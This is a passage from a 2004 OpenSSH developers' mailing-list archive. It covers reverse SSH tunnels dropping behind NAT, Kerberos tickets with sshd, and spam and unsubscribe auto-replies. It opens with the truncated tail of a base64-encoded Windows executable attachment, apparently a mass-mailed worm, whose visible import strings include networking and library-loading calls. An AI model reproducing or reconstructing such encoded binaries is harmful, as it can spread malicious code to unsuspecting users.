AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAgADAAAAIAAAgA4AAABgAACAAAAAAAAAAAAAAAAAAAABAAEAAAA4AACAAAAAAAAA AAAAAAAAAAABAAcEAABQAAAApKABAKgMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQBlAAAA eAAAgAAAAAAAAAAAAAAAAAAAAQAHBAAAkAAAAFCtAQAUAAAAAAAAAAAAAACgcAEAKAAAACAA AABAAAAAAQAYAAAAAACADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgMDAwMDAwMDAwMDAwMDAwMDAwMDA wMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////////////////////// /////////////////////////////////////////////8DAwAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAICAgP////////////////////////////////////////////////////////// /////////////////////////////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP// //////////////////////////////////////////////////////////////////////// /////////////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////// /////////////////////////////////8DAwMDAwMDAwMDAwMDAwMDAwP///////////8DA wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////////////// /////////////////////////////////////////////////////8DAwAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAICAgP///////////8DAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA wMDAwMDAwMDAwMDAwMDAwMDAwP///////////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AICAgP////////////////////////////////////////////////////////////////// /////////////////////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////// /8DAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwP////// /////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////// /////////////////////////////////////////////////////////////8DAwAAAAP8A AAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAMDAwMDAwMDA wMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwP///////////8DAwAAAAAAAAP8AAAAAAP8AAAAA AP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAP////////////////////////// /////////////////////////////8DAwAAAAP8AAAAAAP////////////////////////// //////////////////////8AAAAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA wP///////////8DAwAAAAAAAAP8AAP////8AAAAAAP8AAP////8AAAAAAP8AAAAAAP////// /////wAAAP8AAP///////////////////////////////////////////////////////8DA wAAAAP8AAAAAAP///wAAAP8AAAAAAP///wAAAP8AAAAAAP8AAMDAwP////////8AAAAAAMDA wMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwP///////////8DAwAAAAAAAAP8AAP// //8AAAAAAP8AAP////8AAAAAAP8AAAAAAICAgP///////wAAAP8AAP////////////////// /////////////////////////////////////8DAwAAAAP8AAAAAAP///wAAAP8AAAAAAP8A AAAAAP8AAAAAAP8AAAAAAP////////8AAAAAAMDAwMDAwP///////8DAwMDAwMDAwMDAwMDA wMDAwMDAwP///////////8DAwAAAAAAAAP8AAP////8AAAAAAP8AAAAAAP8AAAAAAP8AAAAA AP8AAMDAwP///wAAAP8AAP///////////////8DAwMDAwMDAwP///8DAwMDAwMDAwP////// /////8DAwAAAAP8AAAAAAP///wAAAP8AAP////8AAAAAAP8AAP////8AAAAAAICAgP////8A AAAAAMDAwMDAwP///////8DAwMDAwP///////////////8DAwP///////////8DAwAAAAAAA AP8AAAAAAP8AAAAAAP///wAAAP8AAAAAAP///wAAAP8AAAAAAP///wAAAP8AAP////////// /////8DAwMDAwMDAwP///////8DAwMDAwP///////////8DAwAAAAP8AAAAAAP8AAAAAAP8A AP////8AAAAAAP8AAP////8AAAAAAP8AAAAAAP8AAAAAAMDAwMDAwP///////8DAwP////// /////////////8DAwP///////////8DAwAAAAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAA AP8AAAAAAP8AAAAAAP8AAAAAAP8AAP///////////////8DAwMDAwP///////4CAgAAAAAAA AAAAAAAAAAAAAAAAAAAAAP8AAAAAAP////////////////////////////////////////// //////8AAAAAAP///////////////8DAwMDAwMDAwMDAwICAgP///////////8DAwICAgAAA AAAAAAAAAP8AAP///////////////////////////////////////////////wAAAP8AAP// /////////////8DAwMDAwMDAwMDAwICAgP///////8DAwICAgAAAAAAAAAAAAP8AAAAAAP8A AAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP////////////////// /////////////4CAgP///8DAwICAgAAAAAAAAAAAAAAAAAAAAP8AAAAAAP8AAAAAAP8AAAAA AP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAP///////////////////////////////4CA gMDAwICAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////// /////////////////////////////////////////////////////4CAgICAgAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////// /////////////////////////////////////4CAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA gICAgICAgICAgICAgICAgICAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP/////+AAAA/gAAAP4AAAD+AAAA/gAAAP4A AAD+AAAA/gAAAP4AAAD+AAAA/gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAEAAAADAAAABwAAAA/+AAAf/gAAP/4AAH//////SH0BAAAA AQABACAgAAABABgAqAwAAAEAAAAAAAAAAAAAAAAAKK4BAPCtAQAAAAAAAAAAAAAAAAA1rgEA AK4BAAAAAAAAAAAAAAAAAEKuAQAIrgEAAAAAAAAAAAAAAAAAT64BABCuAQAAAAAAAAAAAAAA AABargEAGK4BAAAAAAAAAAAAAAAAAGauAQAgrgEAAAAAAAAAAAAAAAAAAAAAAAAAAABwrgEA fq4BAI6uAQAAAAAAnK4BAAAAAACqrgEAAAAAALyuAQAAAAAAyK4BAAAAAAADAACAAAAAAEtF Uk5FTDMyLkRMTABBRFZBUEkzMi5kbGwAaXBobHBhcGkuZGxsAFVTRVIzMi5kbGwAV0lOSU5F VC5kbGwAV1MyXzMyLmRsbAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAARXhpdFBy b2Nlc3MAAABSZWdDbG9zZUtleQAAAEdldE5ldHdvcmtQYXJhbXMAAHdzcHJpbnRmQQAAAElu dGVybmV0R2V0Q29ubmVjdGVkU3RhdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=3D --34222687-- _______________________________________________ openssh-unix-dev mailing list openssh-unix-dev at mindrot.org http://www.mindrot.org/mailman/listinfo/openssh-unix-dev From chlor at schou.dk Thu Mar 4 23:50:08 2004 From: chlor at schou.dk (Hans Schou) Date: Thu, 4 Mar 2004 13:50:08 +0100 (CET) Subject: -R port:host:hostport - communication lost after some minutes Message-ID: Hi As this '-R' command initially works fine I guess it must be a bug. I have to login at a computer which is hidden behind NAT. The user (joe) at the computer then connect to my server with the command: ssh -R 1234:localhost:22 test.com Then I login to test.com and connect back to joes computer: ssh -p 1234 localhost I get successfull connection every time but after a few minutes, typing some simple commands the communication just stops and I can type nothing. The only thing I can do is to ask joe to establish a new connection. Am I doing something wrong? How can I give a better bug report? /hans -- Hamletsgade 4 - 201, DK-2200 K?benhavn N, Phone: +45 3582 9079 Schou Industries ApS http://schou.dk/ CVR: 26 13 44 39 -------------------------------------------------------------- Sprogrevsere vil have at semikolon bliver mere anvendt; jeg er imod ;-) From flavien at lebarbe.net Fri Mar 5 00:30:36 2004 From: flavien at lebarbe.net (Flavien) Date: Thu, 4 Mar 2004 14:30:36 +0100 Subject: -R port:host:hostport - communication lost after some minutes In-Reply-To: References: Message-ID: <20040304133036.GA6958@lebarbe.net> Hello, Hans Shou wrote : > The user > (joe) at the computer then connect to my server with the command: > ssh -R 1234:localhost:22 test.com > > Then I login to test.com and connect back to joes computer: > ssh -p 1234 localhost > > I get successfull connection every time but after a few > minutes, typing some simple commands the communication just > stops and I can type nothing. The only thing I can do is to ask > joe to establish a new connection. I'm interested in tips to debug that kind of problem too. I've already been in exactly the same configuration (ssh -R 1234:localhost:22 and then ssh -p 1234) to bypass NAT, and I've also had problems with it hanging up and me having to ask "joe" to connect again. I must add that in my particular situation, joe connected to "test.com" through "a lot" (at least 3) of internal networks / firewalls / NAT... And that probably is the root of the problem. Flavien. From kumaresh_ind at gmx.net Fri Mar 5 00:33:34 2004 From: kumaresh_ind at gmx.net (Kumaresh) Date: Thu, 4 Mar 2004 19:03:34 +0530 Subject: SSH + Kerberos Password auth References: <084f01c401d5$4af2e270$230110ac@kurco> Message-ID: <08f601c401ed$4f17e720$230110ac@kurco> As a follow up of the previous question, I dig the source and please validate my understanding. When SSH is used with GSSAPI or Kerberos password authentication, once the user is authenticated and after logout, if we do klist, then there are no keys displayed. I have come across the function krb5_free_principal( ). Is this the function that destroys the keys after the authentication is done? Thanks for your answers. Regards, Kumar ----- Original Message ----- From: "Kumaresh" To: "OpenSSH Devel List" Sent: Thursday, March 04, 2004 4:11 PM Subject: SSH + Kerberos Password auth > Hello, > > I have a question about SSH with Kerberos password authentication . > > Do I receive any host ticket to my client machine when I do ssh connection > with Kerberos password authenticaiton? If dont, why? > > If I login to remote machine through telnet with Kerberos Password > authentication [through PAM-kerberos], then I can see the tickets with > klist. But with the same setup for sshd, I cannot see the tickets with > klist. > > Thanks, > Kumaresh > > > > > > --- > Outgoing mail is certified Virus Free. > Checked by AVG anti-virus system (http://www.grisoft.com). > Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004 > > _______________________________________________ > openssh-unix-dev mailing list > openssh-unix-dev at mindrot.org > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev > --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004 From chlor at schou.dk Fri Mar 5 00:42:35 2004 From: chlor at schou.dk (Hans Schou) Date: Thu, 4 Mar 2004 14:42:35 +0100 (CET) Subject: -R port:host:hostport - communication lost after some minutes In-Reply-To: <20040304133036.GA6958@lebarbe.net> References: <20040304133036.GA6958@lebarbe.net> Message-ID: On Thu, 4 Mar 2004, Flavien wrote: > I must add that in my particular situation, joe connected to > "test.com" through "a lot" (at least 3) of internal networks / > firewalls / NAT... And that probably is the root of the problem. I had exactly the same problem with "jane", and she is sitting behind a different router on another location. Both joe and jane has only one router in my setup. I guess I can reproduce the bug witin 15 minutes. /hans -- Hamletsgade 4 - 201, DK-2200 K?benhavn N, Phone: +45 3582 9079 Schou Industries ApS http://schou.dk/ CVR: 26 13 44 39 -------------------------------------------------------------- Sprogrevsere vil have at semikolon bliver mere anvendt; jeg er imod ;-) From sxw at inf.ed.ac.uk Fri Mar 5 02:09:10 2004 From: sxw at inf.ed.ac.uk (sxw at inf.ed.ac.uk) Date: Thu, 4 Mar 2004 15:09:10 +0000 (GMT) Subject: SSH + Kerberos Password auth In-Reply-To: <08f601c401ed$4f17e720$230110ac@kurco> Message-ID: On Thu, 4 Mar 2004, Kumaresh wrote: > As a follow up of the previous question, I dig the source and please > validate my understanding. > > When SSH is used with GSSAPI or Kerberos password authentication, once the > user is authenticated and after logout, if we do klist, then there are no > keys displayed. > I have come across the function krb5_free_principal( ). Is this the function > that destroys the keys after the authentication is done? Err, no -that's just an internal memory destructor. You want the "GssapiDelegateCredentials" option, or the (IIRC) -k command line switch. Read the man pages for more details. S. From deengert at anl.gov Fri Mar 5 02:29:05 2004 From: deengert at anl.gov (Douglas E. Engert) Date: Thu, 04 Mar 2004 09:29:05 -0600 Subject: SSH + Kerberos Password auth References: <084f01c401d5$4af2e270$230110ac@kurco> Message-ID: <40474B41.C579ACF0@anl.gov> Kumaresh wrote: > > Hello, > > I have a question about SSH with Kerberos password authentication . Maybe I am misunderstanding your question. Do you mean when you send your user and password over the network to a remote machine? The sshd on that machine then uses your user and password to get kerberos tickets and saves the tickets in the cache on that machine. > > Do I receive any host ticket to my client machine when I do ssh connection > with Kerberos password authenticaiton? If dont, why? No not on the client. as you are not using Kerberos on the client, only on the remote machine. In this case the client does not need any kerberos code. > > If I login to remote machine through telnet with Kerberos Password > authentication [through PAM-kerberos], then I can see the tickets with > klist. But with the same setup for sshd, I cannot see the tickets with > klist. Is your kerberos password the same as the local machine password? Whose kerberos are you using? What is in your sshd_config? is a KRB5CCNAME environment variable set for you? It works for me, but we don't normally have this turned on, as the intent of Kerberos is to get credentials on the local workstaion once, then use the gssapi to authenticate and delegate to remote hosts. When uses as intended the Kerberos password never leaves the local machine. And if you where to use some Kerberos pre-auth you may not even have a Kerberos password to send! > > Thanks, > Kumaresh > > --- > Outgoing mail is certified Virus Free. > Checked by AVG anti-virus system (http://www.grisoft.com). > Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004 > > _______________________________________________ > openssh-unix-dev mailing list > openssh-unix-dev at mindrot.org > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev -- Douglas E. Engert Argonne National Laboratory 9700 South Cass Avenue Argonne, Illinois 60439 (630) 252-5444 From deengert at anl.gov Fri Mar 5 02:31:27 2004 From: deengert at anl.gov (Douglas E. Engert) Date: Thu, 04 Mar 2004 09:31:27 -0600 Subject: SSH + Kerberos Password auth References: <084f01c401d5$4af2e270$230110ac@kurco> <08f601c401ed$4f17e720$230110ac@kurco> Message-ID: <40474BCF.F014B2C5@anl.gov> Kumaresh wrote: > > As a follow up of the previous question, I dig the source and please > validate my understanding. > > When SSH is used with GSSAPI or Kerberos password authentication, once the > user is authenticated and after logout, if we do klist, then there are no > keys displayed. Normally the ticket cahce is cleaned up when th user logs out. See sshd_config KerberosTicketCleanup yes > I have come across the function krb5_free_principal( ). Is this the function > that destroys the keys after the authentication is done? > No. > Thanks for your answers. > > Regards, > Kumar > > ----- Original Message ----- > From: "Kumaresh" > To: "OpenSSH Devel List" > Sent: Thursday, March 04, 2004 4:11 PM > Subject: SSH + Kerberos Password auth > > > Hello, > > > > I have a question about SSH with Kerberos password authentication . > > > > Do I receive any host ticket to my client machine when I do ssh connection > > with Kerberos password authenticaiton? If dont, why? > > > > If I login to remote machine through telnet with Kerberos Password > > authentication [through PAM-kerberos], then I can see the tickets with > > klist. But with the same setup for sshd, I cannot see the tickets with > > klist. > > > > Thanks, > > Kumaresh > > > > > > > > > > > > --- > > Outgoing mail is certified Virus Free. > > Checked by AVG anti-virus system (http://www.grisoft.com). > > Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004 > > > > _______________________________________________ > > openssh-unix-dev mailing list > > openssh-unix-dev at mindrot.org > > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev > > > > --- > Outgoing mail is certified Virus Free. > Checked by AVG anti-virus system (http://www.grisoft.com). > Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004 > > _______________________________________________ > openssh-unix-dev mailing list > openssh-unix-dev at mindrot.org > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev -- Douglas E. Engert Argonne National Laboratory 9700 South Cass Avenue Argonne, Illinois 60439 (630) 252-5444 From stuge-openssh-unix-dev at cdy.org Fri Mar 5 03:56:12 2004 From: stuge-openssh-unix-dev at cdy.org (Peter Stuge) Date: Thu, 4 Mar 2004 17:56:12 +0100 Subject: -R port:host:hostport - communication lost after some minutes In-Reply-To: References: <20040304133036.GA6958@lebarbe.net> Message-ID: <20040304165612.GA14265@foo.birdnet.se> On Thu, Mar 04, 2004 at 02:42:35PM +0100, Hans Schou wrote: > > I must add that in my particular situation, joe connected to > > "test.com" through "a lot" (at least 3) of internal networks / > > firewalls / NAT... And that probably is the root of the problem. > > I had exactly the same problem with "jane", and she is sitting behind > a different router on another location. Both joe and jane has only one > router in my setup. > > I guess I can reproduce the bug witin 15 minutes. Then I'd guess your NAT firewall has a connection tracking timeout of, exactly, 15 minutes. Use ClientAliveInterval in sshd to induce occasional traffic. //Peter From arise-help at pry.com Fri Mar 5 03:58:28 2004 From: arise-help at pry.com (arise-help at pry.com) Date: Thu, 04 Mar 2004 16:58:28 -0000 Subject: confirm unsubscribe from arise@pry.com Message-ID: <1078419434.2483.ezmlm@pry.com> Hi! This is the ezmlm program. I'm managing the arise at pry.com mailing list. I'm working for my owner, who can be reached at arise-owner at pry.com. To confirm that you would like openssh-unix-dev at mindrot.org removed from the arise mailing list, please send an empty reply to this address: arise-uc.1078419434.hpkjglgibocofjeobdnl-openssh-unix-dev=mindrot.org at pry.com Usually, this happens when you just hit the "reply" button. If this does not work, simply copy the address and paste it into the "To:" field of a new message. I haven't checked whether your address is currently on the mailing list. To see what address you used to subscribe, look at the messages you are receiving from the mailing list. Each message has your address hidden inside its return path; for example, mary at xdd.ff.com receives messages with return path: -mary=xdd.ff.com at pry.com. --- Administrative commands for the arise list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To subscribe to the list digest, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 2479 invoked by alias); 4 Mar 2004 16:57:14 -0000 Delivered-To: arise-unsubscribe-openssh-unix-dev=mindrot.org at pry.com Received: (qmail 2475 invoked from network); 4 Mar 2004 16:57:13 -0000 Received: from unknown (HELO null.cs.brown.edu) (128.148.38.190) by 0 with SMTP; 4 Mar 2004 16:57:13 -0000 Received: from peabody (peabody [128.148.31.111]) by null.cs.brown.edu (Postfix) with ESMTP id BD2C02EFDB for ; Thu, 4 Mar 2004 11:59:34 -0500 (EST) Received: from gss by peabody with local (Exim 3.36 #1 (Debian)) id 1AywC6-0007uO-00 for ; Thu, 04 Mar 2004 11:59:34 -0500 Date: Thu, 4 Mar 2004 11:59:34 -0500 From: openssh-unix-dev at mindrot.org To: arise-unsubscribe-openssh-unix-dev=mindrot.org at pry.com Subject: unsubscribe Message-ID: <20040304165934.GA30364 at cs.brown.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.4i Sender: Greg Seidman From arise-help at pry.com Fri Mar 5 04:04:41 2004 From: arise-help at pry.com (arise-help at pry.com) Date: Thu, 04 Mar 2004 17:04:41 -0000 Subject: GOODBYE from arise@pry.com Message-ID: <1078419809.2562.ezmlm@pry.com> Hi! This is the ezmlm program. I'm managing the arise at pry.com mailing list. I'm working for my owner, who can be reached at arise-owner at pry.com. Acknowledgment: I have removed the address openssh-unix-dev at mindrot.org from the arise mailing list. This address is no longer a subscriber. --- Administrative commands for the arise list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To subscribe to the list digest, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 2558 invoked by alias); 4 Mar 2004 17:03:29 -0000 Delivered-To: arise-uc.1078419434.hpkjglgibocofjeobdnl-openssh-unix-dev=mindrot.org at pry.com Received: (qmail 2554 invoked from network); 4 Mar 2004 17:03:29 -0000 Received: from unknown (HELO null.cs.brown.edu) (128.148.38.190) by 0 with SMTP; 4 Mar 2004 17:03:29 -0000 Received: from peabody (peabody [128.148.31.111]) by null.cs.brown.edu (Postfix) with ESMTP id 6497C2EFF9 for ; Thu, 4 Mar 2004 12:05:50 -0500 (EST) Received: from gss by peabody with local (Exim 3.36 #1 (Debian)) id 1AywIA-0007xj-00 for ; Thu, 04 Mar 2004 12:05:50 -0500 Date: Thu, 4 Mar 2004 12:05:49 -0500 From: openssh-unix-dev at mindrot.org To: arise-uc.1078419434.hpkjglgibocofjeobdnl-openssh-unix-dev=mindrot.org at pry.com Subject: Re: confirm unsubscribe from arise at pry.com Message-ID: <20040304170549.GA30498 at cs.brown.edu> References: <1078419434.2483.ezmlm at pry.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <1078419434.2483.ezmlm at pry.com> User-Agent: Mutt/1.5.4i Sender: Greg Seidman From chlor at schou.dk Fri Mar 5 04:09:55 2004 From: chlor at schou.dk (Hans Schou) Date: Thu, 4 Mar 2004 18:09:55 +0100 (CET) Subject: -R port:host:hostport - communication lost after some minutes In-Reply-To: <20040304165612.GA14265@foo.birdnet.se> References: <20040304133036.GA6958@lebarbe.net> <20040304165612.GA14265@foo.birdnet.se> Message-ID: On Thu, 4 Mar 2004, Peter Stuge wrote: > On Thu, Mar 04, 2004 at 02:42:35PM +0100, Hans Schou wrote: ... > > I guess I can reproduce the bug witin 15 minutes. > > Then I'd guess your NAT firewall has a connection tracking timeout > of, exactly, 15 minutes. Sorry. I mean that if I try to get the error, it would take me less than 15 min to get it. Sometimes it will occour within a minute. > Use ClientAliveInterval in sshd to induce occasional traffic. If don't touch the keyboard at all the connection will close down after 60 minutes. /hans -- Hamletsgade 4 - 201, DK-2200 K?benhavn N, Phone: +45 3582 9079 Schou Industries ApS http://schou.dk/ CVR: 26 13 44 39 -------------------------------------------------------------- Sprogrevsere vil have at semikolon bliver mere anvendt; jeg er imod ;-) From wseas at canada.com Fri Mar 5 06:20:48 2004 From: wseas at canada.com (WSEAS Newsletter on MECHANICAL ENGINEERING) Date: Thu, 4 Mar 2004 21:20:48 +0200 Subject: WSEAS NEWSLETTER in MECHANICAL ENGINEERING Message-ID: <3FE20F4000200D40@fesscrpp1.tellas.gr> (added by postmaster@fesscrpp1.tellas.gr) If you want to contact us, the Subject of your email must contains the code: WSEAS CALL FOR PAPERS -- CALL FOR REVIEWERS -- CALL FOR SPECIAL SESSIONS wseas at canada.com http://wseas.freeservers.com **************************************************************** Udine, Italy, March 25-27, 2004: IASME/WSEAS 2004 Int.Conf. on MECHANICS and MECHATRONICS **************************************************************** Miami, Florida, USA, April 21-23, 2004 5th WSEAS International Conference on APPLIED MATHEMATICS (SYMPOSIA on: Linear Algebra and Applications, Numerical Analysis and Applications, Differential Equations and Applications, Probabilities, Statistics, Operational Research, Optimization, Algorithms, Discrete Mathematics, Systems, Communications, Control, Computers, Education) **************************************************************** Corfu Island, Greece, August 17-19, 2004 WSEAS/IASME Int.Conf. on FLUID MECHANICS WSEAS/IASME Int.Conf. on HEAT and MASS TRANSFER ********************************************************** Vouliagmeni, Athens, Greece, July 12-13, 2004 WSEAS ELECTROSCIENCE AND TECHNOLOGY FOR NAVAL ENGINEERING and ALL-ELECTRIC SHIP ********************************************************** Copacabana, Rio de Janeiro, Brazil, October 12-15, 2004 3rd WSEAS Int.Conf. on INFORMATION SECURITY, HARDWARE/SOFTWARE CODESIGN and COMPUTER NETWORKS (ISCOCO 2004) 3rd WSEAS Int. Conf. on APPLIED MATHEMATICS and COMPUTER SCIENCE (AMCOS 2004) 3rd WSEAS Int.Conf. on SYSTEM SCIENCE and ENGINEERING (ICOSSE 2004) 4th WSEAS Int.Conf. on POWER ENGINEERING SYSTEMS (ICOPES 2004) **************************************************************** Cancun, Mexico, May 12-15, 2004 6th WSEAS Int.Conf. on ALGORITHMS, SCIENTIFIC COMPUTING, MODELLING AND SIMULATION (ASCOMS '04) ********************************************************** NOTE THAT IN WSEAS CONFERENCES YOU CAN HAVE PROCEEDINGS 1) HARD COPY 2) CD-ROM and 3) Web Publishing SELECTED PAPERS are also published (after further review) * as regular papers in WSEAS TRANSACTIONS (Journals) or * as Chapters in WSEAS Book Series. WSEAS Books, Journals, Proceedings participate now in all major science citation indexes. ISI, ELSEVIER, CSA, AMS. Mathematical Reviews, ELP, NLG, Engineering Index Directory of Published Proceedings, INSPEC (IEE) Thanks Alexis Espen WSEAS NEWSLETTER in MECHANICAL ENGINEERING wseas at canada.com http://wseas.freeservers.com ##### HOW TO UNSUBSCRIBE #### You receive this newsletter from your email address: openssh-unix-dev at mindrot.org If you want to unsubscribe, send an email to: wseas at canada.com The Subject of your message must be exactly: REMOVE openssh-unix-dev at mindrot.org WSEAS If you want to unsubscribe more than one email addresses, send a message to nata at wseas.org with Subject: REMOVE [email1, emal2, ...., emailn] WSEAS From wseas at canada.com Fri Mar 5 06:45:00 2004 From: wseas at canada.com (wseas at canada.com) Date: Thu, 04 Mar 2004 19:45:00 -0000 Subject: (auto-response) Re: REMOVE openssh-unix-dev@mindrot.org WSEAS In-Reply-To: <20040304194608.GA2449@cs.brown.edu> References: <20040304194608.GA2449@cs.brown.edu> Message-ID: <20040304194611.14844.cpmta@c009.snv.cp.net> THIS IS AN AUTO-REPLY MESSAGE. Please, we will read your message and we will reply to you soon, IF AND ONLY IF you wrote WSEAS in the Subject. Please, check if you wrote WSEAS in the Subject. If you did not include, the code WSEAS in the Subject please, send your email to us again Thanks WSEAS ----------- Original message follows ----------- -------------- next part -------------- An embedded message was scrubbed... From: openssh-unix-dev at mindrot.org Subject: REMOVE openssh-unix-dev at mindrot.org WSEAS Date: Thu, 4 Mar 2004 14:46:08 -0500 Size: 1014 Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040304/bc92a65b/attachment.mht From arise-help at pry.com Fri Mar 5 08:13:22 2004 From: arise-help at pry.com (arise-help at pry.com) Date: Thu, 04 Mar 2004 21:13:22 -0000 Subject: confirm unsubscribe from arise@pry.com Message-ID: <1078434731.7818.ezmlm@pry.com> Hi! This is the ezmlm program. I'm managing the arise at pry.com mailing list. I'm working for my owner, who can be reached at arise-owner at pry.com. To confirm that you would like openssh-unix-dev at mindrot.org removed from the arise mailing list, please send an empty reply to this address: arise-uc.1078434731.fenlpefamibgciagniel-openssh-unix-dev=mindrot.org at pry.com Usually, this happens when you just hit the "reply" button. If this does not work, simply copy the address and paste it into the "To:" field of a new message. I haven't checked whether your address is currently on the mailing list. To see what address you used to subscribe, look at the messages you are receiving from the mailing list. Each message has your address hidden inside its return path; for example, mary at xdd.ff.com receives messages with return path: -mary=xdd.ff.com at pry.com. --- Administrative commands for the arise list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To subscribe to the list digest, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 7814 invoked by alias); 4 Mar 2004 21:12:11 -0000 Delivered-To: arise-unsubscribe-openssh-unix-dev=mindrot.org at pry.com Received: (qmail 7805 invoked from network); 4 Mar 2004 21:11:39 -0000 Received: from unknown (203.217.30.81) by 0 with SMTP; 4 Mar 2004 21:11:39 -0000 From: openssh-unix-dev at mindrot.org To: arise-unsubscribe-openssh-unix-dev=mindrot.org at pry.com Subject: unsubscribe unsubscribe From djm at mindrot.org Fri 